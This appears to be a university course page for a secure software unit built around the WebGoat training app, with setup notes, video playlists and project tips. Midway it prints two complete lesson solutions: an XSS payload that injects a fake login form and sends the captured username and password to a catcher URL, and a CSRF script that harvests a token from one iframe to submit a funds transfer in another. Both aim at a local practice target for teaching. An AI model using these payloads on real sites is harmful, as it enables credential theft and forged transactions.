Contact: +6017-761 9288
Assessment: 100% Project (with NO TII requirement)
WebGoat & WebWolf:
Version 8 is now released
Version 6.0.1 link: http://webgoat.github.io
Version 5.4 Download link: https://code.google.com/p/webgoat/downloads/list
We will need a Tomcat server, with a MySQL database for this unit.
System Pre-requirement: JDK
The known problems:
Non-English Windows OS conflict.
Running two instances of Tomcat at the same time.
Do not place WebGoat on the Desktop
Do not place WebGoat in the root C: drive
WebGoat 8 and WebWolf Playlist
https://www.youtube.com/playlist?list=PLrHVSJmDPvlqxCfBhPuksHdpViPyeZTsF
Chapter 1
We will be using this number of phases for our SDLC model.
Chapter 4
Chapter 9
Introduction to SQL
Cross-Site Scripting (XSS) - Phishing with XSS
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
Cross-Site Scripting (XSS) - Cross-Site Request Forgery (CSRF) - Token By-Pass
<script type="text/javascript">
<!--
var tokensuffix;

// Read the CSRF token out of the form loaded in the first (same-origin) iframe.
function readFrame1()
{
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[0];
    tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
    loadFrame2();
}

// Submit the transfer request in the second iframe, appending the harvested token.
function loadFrame2()
{
    var testFrame = document.getElementById("frame2");
    testFrame.src = "http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=5000" + tokensuffix;
}
//-->
</script>
<iframe src="http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling="yes" height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling="yes" height="300"></iframe>
WebGoat 6 Playlist
https://www.youtube.com/playlist?list=PLrHVSJmDPvlrpEy7CXrD8GzNsHVk8FxAy
Project
Using Draw.IO for diagramming is a lot easier than drawing shapes and lines in Word.
There is NO need to print out your documentation. Submit it in softcopy.
Useful link: www.owasp.org
FAQ
Q: I have copied Java into my PC but I still can't get it to work properly.
A: Do a proper installation of your Java. If you just copy Java, the path and environment may not be set properly.
Special Thanks To
North Carolina State University
American Military University